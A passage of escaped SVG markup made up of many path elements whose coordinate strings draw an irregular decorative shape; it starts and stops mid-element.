d=\"M886,15.3c-.7-.5-4.2-1.5.5-1-5.9-.9-4.2-1.4-6.8-2.1-5.6-.6,6.1,2.1-.3,1.4-.2-.2-.5-.3-2.2-.6h0c-.9.4,2.4,2-5.4.9,3.8,1,3.7,1.2-.7.7,2.4.4,4.4.6,6,.8a21.86,21.86,0,0,0,4.2.2c.2.2,3.5.7,3.3.9a25.55,25.55,0,0,0-2.9.1c1.8.3,3.3.6,4.3.8.7-.2-1.6-.6-1.3-.8,1.5.3,1.9.5,3.3.8.5-.3-2.5-.8-2.5-1.2a39.07,39.07,0,0,1,4.3.9c-1.9.3,7.6,2.4,4,2.3,4.3.5,1.1-.5,2.6-.6-.7-.3-5-.8-5.4-1.1-.1-.1-.1-.2-.2-.4a35.54,35.54,0,0,1,7.5,1.6c2.3.1-3.2-1-3.5-1.4,1.1,0,.6-.4,4,.2,2.1.5,5,1.1,6.6,1.6-2.4-.4-4-.7-5.3-1-.4.6,3.5.7,4.5,1.3.2.5-1.3.4-2.7.4,1.2.2,3,.5,3.2.6-5.1.3-1.7,2.6-7.4,2.9-1.2-.2-1.2-.4-1.2-.5a37.31,37.31,0,0,0-4.1-.5c2.8.7,7.2,1.6,10.8,2.3.5.6-3.5-.6-4-.2,2.6.7,5.1.8,8.4,1.4-3.3-1,.3-.8-3.7-1.7-1.1-.1-.1.4-3-.2a37.58,37.58,0,0,1,6,.3c-1.3-.6-1.5-1.2-.6-1.2,2,.1,2.1.4,4.3.8.6-.4-5.1-1.1-4.5-1.4,2,.3,3.5.5,4.1.5-7.2-1.1,4.7,0-1.6-1.3-1.4-.1-.2.5-2.9.1-.7-.8,2.7-.4,4.6-.5-1.2-.2-3-.5-3.2-.6,4.4.3-.8-1.2,2.1-1.6-4.9-.8-2.2-.7-2.4-1.1-3.3-.6-3-.3-6.2-.9,1.9.8-.5.1-4-.2-1.6-1-6.6-2.2-10.2-3.3C886.2,14.4,889.8,15.6,886,15.3Z\"></path>\n        <path d=\"M911.8,26.9c.9.1-.1-.3,1.4-.1.5.1,1.3.2,2.6.4,0,.2.5.5,1.2.4,0-.2-.6-.3-1.2-.5-1.1-.2-1.9-.3-2.6-.4a25.93,25.93,0,0,1-3.7-.6C909.8,26.3,908.7,26.5,911.8,26.9Z\"></path>\n        <path d=\"M869,18.1c3.1.5,7.9,1,6.1.6-1.9-.2-2.7-.2-5.1-.5-.2-.2,0-.4-2.3-.7C867.6,17.7,869,17.9,869,18.1Z\"></path>\n        <path d=\"M889.3,20.3a19.07,19.07,0,0,0,2,.2,2.71,2.71,0,0,0,1.2.4c0-.5,1.8-.6-3.7-1.6C890.9,20,889.2,20.2,889.3,20.3Z\"></path>\n        <path d=\"M876,16.6c-3.7-.6-3.1-.1-5-.3a18.2,18.2,0,0,0,3.1.5C871.2,16.2,877.4,17.2,876,16.6Z\"></path>\n        <path d=\"M913.4,17.7c1.3.3.8.4,0,.3a12.05,12.05,0,0,0-1.9,0,7.14,7.14,0,0,0,1.9.2,10.53,10.53,0,0,1,3.3.5,10.36,10.36,0,0,0-2-.2c6.7.9,1.3-.3,2.6-.6a24.13,24.13,0,0,0-3.8-.4,4.87,4.87,0,0,1-1.2-.1C912.7,17.5,913.1,17.6,913.4,17.7Z\"></path>\n        <path d=\"M870.1,10.2c3.7.9-.8.5,4.5,1.4-.4-.3-2.3-.8-.3-.7C872,10.7,870.2,9.9,870.1,10.2Z\"></path>\n        <path d=\"M874.2,10.7c1.2.2,2.1.5,3,.7,1.2.3,2.5.6,4.5,1-.1-.2-.1-.3-.2-.5-1.1-.2-3.1-.5-4.3-.7-.6-.1-1-.2-1-.3a1.56,1.56,0,0,0,1-.1.18.18,0,0,0,0-.27h0a2.37,2.37,0,0,0-1.4-.5C873.5,9.9,877.5,11.1,874.2,10.7Z\"></path>\n        <path d=\"M879.6,9.8a7.46,7.46,0,0,0-2.1-.3c1.2.3,7.4,1.8,6.5,1.4-3-.6-.4-.6.8-.4a15.73,15.73,0,0,1-3.3-.8C879.6,9.5,883.1,10.3,879.6,9.8Z\"></path>\n        <path d=\"M910.2,11a12.17,12.17,0,0,1,3.4.4,41,41,0,0,0,4.9.9c-.2-.3-2.7-.8-4.9-1.1S909.6,10.6,910.2,11Z\"></path>\n        <path d=\"M928.2,103.9c-3.3-.6-1.9,0-5.1-.6-1-.6,1.3-.2.7-.7-.5-.2-4.4-1.2-5.3-1,3.5.8.2.7.5,1.1a17.84,17.84,0,0,1,3.3.8C922.3,103,929.9,104.9,928.2,103.9Z\"></path>\n        <path d=\"M761.4,34.5c3,.4,3.2.4,6.3,1l-.3-.6c-2.8-.7-3.6-.5-5.3-1,.2-.2,1.7,0,4.1.5a12.72,12.72,0,0,0-4.7-1.7C762.7,33.6,758.4,33.2,761.4,34.5Z\"></path>\n        <path d=\"M824.9,41.9c0-.1.8,0,1.1.2a2.71,2.71,0,0,0,1.2.4c-.1-.7,3.2.1,4.7-.2-4.6-.9-5.8-.8-8.3-1.2C824.2,41.4,822.6,41.5,824.9,41.9Z\"></path>\n        <path d=\"M818.7,34.9c-4.2-.4-.4.7,1.5,1.3a7.45,7.45,0,0,1-2-.1c-1.7-.4,0-.5-3.4-1,1.5,1,.4,1-.3,1.4,4.3.2,6,1.2,9.4,1.6-3.5-.8,6.1.5,1.7-.5-1.7-.1-4.3-1.2-2.5-1.2-1.5-.5-3.8-.5-4.3-.8-1.6-.7,1.9-.2,4,.3a49.92,49.92,0,0,0-8.7-2.1C813.7,34,818.2,34.5,818.7,34.9Z\"></path>\n        <path d=\"M793.3,30.3c-8.2-1.2-3.4.8-4.1,1.5a7.13,7.13,0,0,1,3,.5c-3.3-.1,2.2,1.6,2,2.1.9-.4,2.2-1.1-1-2,2.7.3,1.8-.1.7-.6,1.8.3,3.3.6,4.3.8a36.07,36.07,0,0,0-8-2.5C791.9,30.3,793.9,30.7,793.3,30.3Z\"></path>\n        <path d=\"M1701.8,92.1c1.7-.2,3.8-.5,1.8-1h-1.7c-3.4.2.2,1.2-7.4.6,2.7.7,4.2.9,1.4,1.6,5.8.2,4.8-.3,6-.5.1,0,.2-.1.4-.1h-.4C1699.1,92.5,1700.2,92.3,1701.8,92.1Z\"></path>\n        <path d=\"M1676,91.4c-3.6-.4,0-.6-6.3-.8C1670.3,90.9,1671.3,91.2,1676,91.4Z\"></path>\n        <path d=\"M1697.2,91.7c1-.3,4.5-.5-.8-.9C1697.5,91.1,1692.8,91.4,1697.2,91.7Z\"></path>\n        <path d=\"M1669.2,85.2a66.58,66.58,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C1675.3,84.8,1673.1,85.2,1669.2,85.2Z\"></path>\n        <path d=\"M1676.8,84.4c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C1675.7,84.6,1681.1,84.6,1676.8,84.4Z\"></path>\n        <path d=\"M1649.6,83.4c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C1645.7,83.6,1649.2,83.6,1649.6,83.4Z\"></path>\n        <path d=\"M1653.4,81.5c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C1646,81.2,1649.8,81.7,1653.4,81.5Z\"></path>\n        <path d=\"M1663,81.3c-2.6.1-6.4,0-6.7.3C1661,81.8,1663,81.7,1663,81.3Z\"></path>\n        <path d=\"M1656.4,80.1a37.64,37.64,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C1656.5,80.7,1654.9,80.5,1656.4,80.1Z\"></path>\n        <path d=\"M1697.3,80.8c-.4.3-7.1.6.8.9C1695.7,81.3,1701.4,81.1,1697.3,80.8Z\"></path>\n        <path d=\"M1689.9,77.1c.2-1.1,1.6-1.1,3.6-2.2-7.2-.1-7.7,0-2.4.5-2.7-.1-3,.1-5.6,0C1690.9,76,1683.8,76.9,1689.9,77.1Z\"></path>\n        <path d=\"M1695.3,73.8c-5.3,0-4.4.6-6.1,1C1695.7,74.8,1694.2,74.2,1695.3,73.8Z\"></path>\n        <path d=\"M1424,67c-5.6-.2-1.5,1.4-.4,1.1C1423.5,67.5,1423.1,67.5,1424,67Z\"></path>\n        <path d=\"M1644.3,71.1c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C1647.2,71,1647.7,71.2,1644.3,71.1Z\"></path>\n        <path d=\"M1448.2,66.1c0-.4,1.8-.7,1.8-1.2C1446.3,65,1444.3,66.1,1448.2,66.1Z\"></path>\n        <path d=\"M1696.8,70.8c.2-.4,2.6-1-1.3-1.4C1695.3,69.9,1691.7,70.2,1696.8,70.8Z\"></path>\n        <path d=\"M1473.3,64.6c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C1481.5,64.8,1475.4,64.4,1473.3,64.6Z\"></path>\n        <path d=\"M1460.1,63.8c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5-3.4.1-6.2-.5-7.1-.2,2.2.2,4.2.6,2,.7C1458.2,63.7,1459.1,63.8,1460.1,63.8Z\"></path>\n        <path d=\"M1642.1,67c-.6.5,7.3.4,10,.3C1648.7,67,1645.1,67.3,1642.1,67Z\"></path>\n        <path d=\"M1649.2,64c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C1645.6,64.4,1649.5,64.4,1649.2,64Z\"></path>\n        <path d=\"M1656.6,64.6c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C1657,65,1660.6,64.8,1656.6,64.6Z\"></path>\n        <path d=\"M1647.3,63.5c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C1639.7,63.1,1645,63.2,1647.3,63.5Z\"></path>\n        <path d=\"M1499.7,58.4c4.8.2,7.4-.4,2.2-.6C1500.1,57.8,1501.6,58.3,1499.7,58.4Z\"></path>\n        <path d=\"M1645.4,61.3c-1.1-.3.2-.4,4-.2-2-.2-1.5-.3-.5-.4,1.8,0,3.7.1,5.5.1-.2-.3,2.8-.2,4-.4a8.61,8.61,0,0,1-2.3-.4,20.74,20.74,0,0,0,5.1.3c1.4-.1,1.6-1.2-3.7-1.1,3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.3.1-.8.4-.4.6a27.34,27.34,0,0,0-3-.1c.2,0,.3.1.4.1-3.7-.5.4-.9,3.8-1.3-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8.9.8,2.8,1.3.3,2,1.6,0,4.4.4,5.4.3.2.1-.2.2-1.6.2h.3C1643.8,60.4,1640.9,61,1645.4,61.3Z\"></path>\n        <path d=\"M1680,59.6c1.6.5-.5.8,3.6,1-1.3-.4,1.9-.7,5.2-.4C1687.3,59.4,1683.7,60.1,1680,59.6Z\"></path>\n        <path d=\"M1695.3,59.6c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C1698.8,59.1,1696.5,59.3,1695.3,59.6Z\"></path>\n        <path d=\"M1653.3,57.7c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C1651.5,57.5,1649.1,57.5,1653.3,57.7Z\"></path>\n        <path d=\"M1602,54.7c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C1603.9,55.4,1605.1,54.8,1602,54.7Z\"></path>\n        <path d=\"M1575.4,54.4c-1-.4,3.6-.2,3.8-.5-2,0-3.2-.1-4.4-.2C1576.6,54,1570.9,54.1,1575.4,54.4Z\"></path>\n        <path d=\"M1675.5,56.1c-.4.2-5.4,0-3.9.4C1676.2,56.7,1679.4,56.3,1675.5,56.1Z\"></path>\n        <path d=\"M1647.1,55.3c-1.6-.4,3.5-.1,3.9-.3-4.4,0-3.6-.3-5.9-.4C1644.3,54.9,1644.1,55.1,1647.1,55.3Z\"></path>\n        <path d=\"M1583,53.6c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C1589.7,53.8,1581.7,53.2,1583,53.6Z\"></path>\n        <path d=\"M1509.8,50.9c1.1,0,1.8.1,2.3.1-.8.1-.5.2-1.3.3,2.4-.1,2.1.1,2.2.3s.2.3,1,.4c-5,.1-2.2.9,1.1,1.2-.1,0-.1,0-.2-.1.8.1,2.1.2,4,.3-1.8-.1-2.3-.3-2.7-.6.6,0,1.1-.1.7-.2-.9-.3-4.9-.5-2.7-.7a2.08,2.08,0,0,1,.7.1l.9-.3c1,0,.8-.1.2-.1,1.1-.6,1-1.3-4.5-1.8-4.1.2,3.1.7,2.4,1.1C1512.3,50.9,1509.9,50.8,1509.8,50.9Z\"></path>\n        <path d=\"M1654.3,54.1c-3.9-.1-5.2.5-2.1.7C1652.1,54.5,1654.3,54.4,1654.3,54.1Z\"></path>\n        <path d=\"M1687.5,55.5c.3-.4,1.3-.5-3.4-.7C1685.1,55,1682.5,55.5,1687.5,55.5Z\"></path>\n        <path d=\"M1557.1,52.6c.6-.2,3.2-.2,2.2-.6C1556.1,51.9,1552.2,52.4,1557.1,52.6Z\"></path>\n        <path d=\"M1683.5,52.6c-5-.2-2.6.8-.6.9C1685.3,53.1,1682.1,52.9,1683.5,52.6Z\"></path>\n        <path d=\"M1651.7,48c.8-.4-3.7-.6-.7-.8C1646.5,47,1647.4,48.1,1651.7,48Z\"></path>\n        <path d=\"M1700.6,46.7c1,.2-1.1.6,2,.7-.3-.1,0-.1.4-.2.9-.1,2.3-.3,0-.4C1702.5,46.8,1701.7,46.8,1700.6,46.7Z\"></path>\n        <path d=\"M1624.1,43.5c-3-.2-5.8-.4-8.8-.5C1614.6,43.3,1623.2,43.6,1624.1,43.5Z\"></path>\n        <path d=\"M1673.4,42.6c-2.2-.5,4.5-.2,5.2-.4C1674.7,41.7,1666.6,42.4,1673.4,42.6Z\"></path>\n        <path d=\"M1579.2,38.2c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C1582,38.3,1583.6,38.4,1579.2,38.2Z\"></path>\n        <path d=\"M1590.9,38.9c2,.1,2.5.2,4.4.3a4.17,4.17,0,0,1-1.1-.3c2.4,0,3.7.5,5,.2-2.4-.4-1.9-1.1-6.1-1.3a15,15,0,0,0,1.5.4C1591.1,38.2,1590.1,38.5,1590.9,38.9Z\"></path>\n        <path d=\"M1588.2,37.4c4.5.2-3,.5,3.4.7C1593.9,38,1591.6,37.2,1588.2,37.4Z\"></path>\n        <path d=\"M1648.6,87c5.3.2,13.1.2,9.6-.1C1657.6,87.4,1648.9,86.5,1648.6,87Z\"></path>\n        <path d=\"M1686.1,83.8c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6-4.6-.2-2.7.2-5.4.2-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.16,17.16,0,0,1,5.2-.4C1684.7,83.9,1685.9,84,1686.1,83.8Z\"></path>\n        <path d=\"M1684.2,80.1a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8-4.2.2-4.2-.3-5.7-.1,3.2,1,2.4,1.5-5.3,1.8C1681.7,79.6,1683.7,79.8,1684.2,80.1Z\"></path>\n        <path d=\"M1697.4,73.1c-4.4-.2-3,.7-2.3.6C1696.3,73.5,1698.9,73.5,1697.4,73.1Z\"></path>\n        <path d=\"M1646.8,72.4l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C1642.1,71.8,1644.9,72.3,1646.8,72.4Z\"></path>\n        <path d=\"M1696.6,69a24,24,0,0,0,5.8-.2h2.4c3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-1.6.1-1.6.4-3,.5-.7,0-1.8,0-3.6-.1C1699.9,68.8,1694.7,68.6,1696.6,69Z\"></path>\n        <path d=\"M1456.3,62.7c.8-.1,2.8-.1,5.5-.1a29.78,29.78,0,0,0-4.7-.7C1461.5,62.4,1452.3,62.7,1456.3,62.7Z\"></path>\n        <path d=\"M1537.7,60.5c-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2-1.7-.4,6.7-.4,2.1-.8a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3C1534.9,59.6,1535.2,60.2,1537.7,60.5Z\"></path>\n        <path d=\"M1663.5,62.9c1.9,0,3.8.1,5.7.1C1670.4,62,1668.7,62.8,1663.5,62.9Z\"></path>\n        <path d=\"M1529.9,58.1a123.6,123.6,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2-8.4-.2.9-1-5.6-1.7-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4a24.44,24.44,0,0,0-4.1-.2,1.54,1.54,0,0,0-.8-.3c.3-.1.4-.1.4-.2,2.7,0,6.8.1,9,.3-.7-.4.3-1-3.1-1.5,3.4,1.1-.1,1.2-5.9,1.1-.4-.5-3.4-1.2,2.3-1.6-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1a5.6,5.6,0,0,1,.7-.2c-5.1,1,.6,2.5-2,3.4-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4C1537.9,58.3,1532.2,58,1529.9,58.1Z\"></path>\n        <path d=\"M1508.8,54.5c-.6-.5-.4-1,3.2-1.1-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3C1512.5,53.4,1503.4,54.1,1508.8,54.5Z\"></path>\n        <path d=\"M1515,53.7c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C1518,54.2,1519.1,53.8,1515,53.7Z\"></path>\n        <path d=\"M1662.7,57.3c1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2,3.2.2-1.8.5,3.4.7C1658.9,56.8,1660.7,57.3,1662.7,57.3Z\"></path>\n        <path d=\"M1664.9,55.1c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C1666.7,54.8,1660.8,54.9,1664.9,55.1Z\"></path>\n        <path d=\"M1645.6,52c4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.5,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6.4-.2,2.8-.2,2.3-.5-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1.1,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4C1650.4,51.7,1648.9,52,1645.6,52Z\"></path>\n        <path d=\"M1614,47.7c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C1613.7,48.5,1613.3,48.1,1614,47.7Z\"></path>\n        <path d=\"M1651,45.6c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C1651.5,44,1658.2,46.5,1651,45.6Z\"></path>\n        <path d=\"M1670.6,44.2c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C1669,45.3,1671.4,44.4,1670.6,44.2Z\"></path>\n        <path d=\"M1593.1,46.2c-5.8,0-.2-.6-6.1-.6C1586.1,45.9,1593.8,46.6,1593.1,46.2Z\"></path>\n        <path d=\"M1676.8,44.9c2.8-.2.3-.7-3.5-.8C1677.4,44.4,1673.9,44.5,1676.8,44.9Z\"></path>\n        <path d=\"M1586.5,40.2c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C1588.8,39.7,1589.6,40.1,1586.5,40.2Z\"></path>\n        <path d=\"M1556.4,48.6c.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3c-.3-.7,4.2-.4,6.2-.8C1561.3,48.4,1559.8,48.6,1556.4,48.6Z\"></path>\n        <path d=\"M916.3,65.8c-.9-.6,1.5-.5,3.9.1-1-.8-3.8-.5-6.5-1.4C914.9,65.1,913.3,65.3,916.3,65.8Z\"></path>\n        <path d=\"M925.1,66a19.06,19.06,0,0,0,3.1.4c-2.7-.6,2.6.1,1.8-.4-3.6-.4-.8-.5-3.3-.9C927.8,65.9,926.1,65.9,925.1,66Z\"></path>\n        <path d=\"M920,61.2c.3-.4,1.1-.3-2.4-1.1C918.3,60.5,916.2,60.7,920,61.2Z\"></path>\n        <path d=\"M917.5,57.9c-3.7-.7-2.1.5-.6.8C918.6,58.6,916.4,58.1,917.5,57.9Z\"></path>\n        <path d=\"M949.4,62.1c-.2-.4,2.7,0,3.8-.1C948.7,61,946.5,61.3,949.4,62.1Z\"></path>\n        <path d=\"M981.6,64.9c.7-.2-3.2-1.3-4.4-1.2,2.2.4.5.6,3.2.8A3.62,3.62,0,0,0,981.6,64.9Z\"></path>\n        <path d=\"M962.6,61.5c.3-.3,3.1,0,2.7-.4C962.4,60.6,961.2,61.1,962.6,61.5Z\"></path>\n        <path d=\"M973.1,61.3c-3.2-.5-4-.4-6.1-.7a8.3,8.3,0,0,0,2.4,1C969.7,61.2,973.9,61.9,973.1,61.3Z\"></path>\n        <path d=\"M942.7,56c-.6.2-1,.9,3.7,1.7C944.9,57.1,944.5,56.6,942.7,56Z\"></path>\n        <path d=\"M936.4,54.9c-.6.3-.3.8-3.6.5,2.9.5,2,.1,4.2.7,0-.3,4.1,0,1.6-.6C937.4,55.7,938.3,55.1,936.4,54.9Z\"></path>\n        <path d=\"M987.8,63.6a23.44,23.44,0,0,0,3.5,1.4C993.1,65,992.4,64.2,987.8,63.6Z\"></path>\n        <path d=\"M1049.8,74.1a24.69,24.69,0,0,1-5.2-.8C1044.1,73.9,1053.1,74.9,1049.8,74.1Z\"></path>\n        <path d=\"M932.4,54.7c-.7-.4,4.2.1-1.4-.9C931.7,54.1,930.1,54.3,932.4,54.7Z\"></path>\n        <path d=\"M961.6,59.2c1.9.1,3.7.4,1.8-.3C960.8,58.4,959.3,58.7,961.6,59.2Z\"></path>\n        <path d=\"M994.5,63.5c.7.5,1.6,1,4.6,1.5A12.64,12.64,0,0,0,994.5,63.5Z\"></path>\n        <path d=\"M964.8,57.9c.6-.2,1.3-.4-1.4-1C964.4,57.4,960.7,57.1,964.8,57.9Z\"></path>\n        <path d=\"M966.5,55.3c.6,0,2.2-.2-.3-.6a7.46,7.46,0,0,1-2.1-.3Q964.1,54.7,966.5,55.3Z\"></path>\n        <path d=\"M970,54.5c-1.9-.4-3.2-.8-5.4-1.2-.4,1.1,15.7,2.8,7.2.9C970.4,53.9,973.4,55,970,54.5Z\"></path>\n        <path d=\"M918.1,44.8c-.4-.3-3.5.4.4.8C920.8,45.7,917.5,45,918.1,44.8Z\"></path>\n        <path d=\"M932.9,47.4c-3-.3-9.8-1.8-10.4-1.5C923.8,46,933.6,48.2,932.9,47.4Z\"></path>\n        <path d=\"M1107.8,76c1,.2,2.1.3,3.1.5-.1-.2-.1-.3-.2-.5C1107.9,75.5,1108.1,75.8,1107.8,76Z\"></path>\n        <path d=\"M917.7,39.7c1.3,0,6.2.4,1.7-.5.8.4-.2.4-3-.2C916.7,39.2,916.3,39.4,917.7,39.7Z\"></path>\n        <path d=\"M1102.9,67.5c-.7-.3.9-.4-1.3-.8.3.3-.7.2-3-.2.7.3-.9.4,1.3.8C1099.2,66.9,1100.9,67,1102.9,67.5Z\"></path>\n        <path d=\"M918.2,36.5c-2-.3-3.9-.6-5.3-.9a5.19,5.19,0,0,0-1.1-.2c.3.1.7.2,1.1.3,1.6.4,3.9.9,5.5,1.3C918.3,36.9,918.3,36.7,918.2,36.5Z\"></path>\n        <path d=\"M1115.1,66.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3,.6.4.6-.8.4,2.9.5,2.2.6,4.2.7C1114.3,67,1114.3,66.9,1115.1,66.7Z\"></path>\n        <path d=\"M913.8,33.4c0-.4.4-.5-.8-.9a10.78,10.78,0,0,0-1.7-.4c-1.9-.2-.8.6,1.7,1.2A2.18,2.18,0,0,1,913.8,33.4Z\"></path>\n        <path d=\"M915.7,33.3c2.7.4,4,.5,4,.2-1.4-.3-2.1-.5-4.2-.8A1.42,1.42,0,0,0,915.7,33.3Z\"></path>\n        <path d=\"M926.2,32.9c-.1-.2,2.8.3,1.9-.1a41.72,41.72,0,0,0-4.3-.8Q923.8,32.3,926.2,32.9Z\"></path>\n        <path d=\"M1105.1,61.9c2.6.4,5.6.4,1.8-.3C1106.6,61.8,1104.8,61.5,1105.1,61.9Z\"></path>\n        <path d=\"M925.4,31.2c-3.5-.5-4-.3-4.9-.1,2,.3,2.4.5,4.2.8C924,31.3,923,31,925.4,31.2Z\"></path>\n        <path d=\"M1109.9,61.9c-3.9-1,1.7-.2-2.4-1.1-1.1,0-1.1.3-1.7.5C1107.8,61.7,1108,61.6,1109.9,61.9Z\"></path>\n        <path d=\"M1218.5,78.8c-1.6.1.8.6.5,1.1C1220.7,80.1,1220.3,79.2,1218.5,78.8Z\"></path>\n        <path d=\"M1108.5,60.9c1.4.1,1.5-.4-1.4-.9C1107.8,60.3,1106.2,60.5,1108.5,60.9Z\"></path>\n        <path d=\"M919.6,29.2c2.5.1-.3-1.3,3.5-.9,0-.3-1.8-.6-3.4-1C922.4,28.3,916,28.1,919.6,29.2Z\"></path>\n        <path d=\"M934,30.9c-3-.3-6.8-.9-1.9.1.1.1.2.2,1.1.3C932.2,30.9,934.5,31.3,934,30.9Z\"></path>\n        <path d=\"M929,28.6c.1.3-1.6.1-.7.5,2.6.5,5.1.9,5.1.6-1.2-.2-3-.5-3.2-.6S930.2,28.8,929,28.6Z\"></path>\n        <path d=\"M921.6,27.2c1.8.1-.5-.5-3.4-1C918.8,26.5,918.8,26.8,921.6,27.2Z\"></path>\n        <path d=\"M1203.4,73.4c-2.8-.5-3.4-.4-2.9,0a28.64,28.64,0,0,1,3.2.6C1203.4,73.7,1201.5,73.3,1203.4,73.4Z\"></path>\n        <path d=\"M923.6,27.3c1.4.2,2.8.5,4.2.7l-.3-.6C923.6,26.7,922.9,26.8,923.6,27.3Z\"></path>\n        <path d=\"M927.4,27.2c1.1-.1,3.3.2,3.9,0C928.4,26.7,924.4,26.4,927.4,27.2Z\"></path>\n        <path d=\"M1211.4,74c1.4.2,2.3.4,3.2.6.1-.3-.5-.7-2.4-1.1C1212.6,73.9,1212.2,74,1211.4,74Z\"></path>\n        <path d=\"M940.7,26.7c1.4.6.8.5-1.8.3a17.9,17.9,0,0,0-3.3-.9c1.6.8,4.8,1.3,2.6,1.4,1.3.3,2.9.6,5.3,1,.9-.3-4-.8-3.4-1.1a10.38,10.38,0,0,0,4,.3C941.3,27.3,944.8,27.2,940.7,26.7Z\"></path>\n        <path d=\"M915.4,22.2c-.9,0-2.4.6,1.5,1.1C914.2,22.6,918.4,22.9,915.4,22.2Z\"></path>\n        <path d=\"M916.9,17.2a5.13,5.13,0,0,0-2.4-1.1C913.7,16.1,913.7,16.7,916.9,17.2Z\"></path>\n        <path 